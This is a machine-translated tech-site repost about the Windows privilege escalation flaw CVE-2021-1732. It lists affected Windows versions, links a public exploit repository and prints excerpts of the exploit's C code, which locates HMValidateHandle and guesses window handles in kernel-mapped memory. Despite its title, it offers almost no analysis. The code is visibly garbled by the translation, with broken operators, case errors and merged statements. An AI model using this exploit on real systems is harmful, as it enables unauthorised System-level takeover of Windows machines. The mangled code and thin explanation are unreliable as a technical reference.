Shulou(Shulou.com)05/31 Report--

What this article shares with you is the analysis of how to analyze the Windows local privilege promotion vulnerability CVE-2021-1732. The editor thinks it is very practical, so I share it with you. I hope you can get something after reading this article. Let's take a look at it.

Brief introduction of vulnerabilities

On February 10, 2021, Microsoft fixed a Windows local privilege escalation vulnerability numbered CVE-2021-1732, which can be exploited by local attackers to escalate privileges to System, and EXP has been made public.

Scope of influence

Windows Server, version 20H2 (Server Core Installation)

Windows 10 Version 20H2 for ARM64-based Systems

Windows 10 Version 20H2 for 32-bit Systems

Windows 10 Version 20H2 for x64-based Systems

Windows Server, version 2004 (Server Core installation)

Windows 10 Version 2004 for x64-based Systems

Windows 10 Version 2004 for ARM64-based Systems

Windows 10 Version 2004 for 32-bit Systems

Windows Server, version 1909 (Server Core installation)

Windows 10 Version 1909 for ARM64-based Systems

Windows 10 Version 1909 for x64-based Systems

Windows 10 Version 1909 for 32-bit Systems

Windows Server 2019 (Server Core installation)

Windows Server 2019

Windows 10 Version 1809 for ARM64-based Systems

Windows 10 Version 1809 for x64-based Systems

Windows 10 Version 1809 for 32-bit Systems

Windows 10 Version 1803 for ARM64-based Systems

Windows 10 Version 1803 for x64-based Systems

Affects almost all major Windows 10 systems

Loophole recurrence

The reproduction environment is Windows 10 Professional Edition 1903.

Use exp to elevate permissions directly to System

EXP

Thank you for the EXP source code provided by Master KaLendsi. The download address is as follows:

Https://github.com/KaLendsi/CVE-2021-1732-Exploit

Some of the EXP codes are as follows:

BOOL FindHMValidateHandle () {HMODULE hUser32 = LoadLibraryA ("user32.dll"); if (hUser32 = = NULL) {printf ("Failed to load user32"); return FALSE;} BYTE* pIsMenu = (BYTE*) GetProcAddress (hUser32, "IsMenu"); if (pIsMenu = = NULL) {printf ("Failed to find location of exported function 'IsMenu' within user32.dll\ n") Return FALSE;} unsigned int uiHMValidateHandleOffset = 0; for (unsigned int i = 0; I

< 0x1000; i++) { BYTE* test = pIsMenu + i; if (*test == 0xE8) { uiHMValidateHandleOffset = i + 1; break; } } if (uiHMValidateHandleOffset == 0) { printf("Failed to find offset of HMValidateHandle from location of 'IsMenu'\n"); return FALSE; } unsigned int addr = *(unsigned int *)(pIsMenu + uiHMValidateHandleOffset); unsigned int offset = ((unsigned int)pIsMenu - (unsigned int)hUser32) + addr; //The +11 is to skip the padding bytes as on Windows 10 these aren't nops g_pfnHmValidateHandle = (lHMValidateHandle)((ULONG_PTR)hUser32 + offset + 11); return TRUE;}HWND GuessHwnd(QWORD *pBaseAddress, DWORD dwRegionSize){ QWORD qwBaseAddressBak = *pBaseAddress; QWORD qwBaseAddress = *pBaseAddress; DWORD dwRegionSizeBak = dwRegionSize; HWND hwndMagicWindow = nullptr; do { while (*(WORD*)qwBaseAddress != g_nRandom&dwRegionSize >

0) {qwBaseAddress + = 2; dwRegionSize-- } / / if (* (DWORD*) ((DWORD*) qwBaseAddress + (0x18 > > 2)-(0xc8 > > 2))! = 0x8000000) {qwBaseAddress = qwBaseAddress + 4; QWORD qwSub = qwBaseAddressBak-qwBaseAddress DwRegionSize = dwRegionSizeBak + qwSub;} hwndMagicWindow = (HWND) * (DWORD*) (qwBaseAddress-0xc8); if (hwndMagicWindow) {break;}} while (true); return hwndMagicWindow } the above is the analysis of how to analyze the Windows local privilege escalation vulnerability CVE-2021-1732. The editor believes that there are some knowledge points that we may see or use in our daily work. I hope you can learn more from this article. For more details, please follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.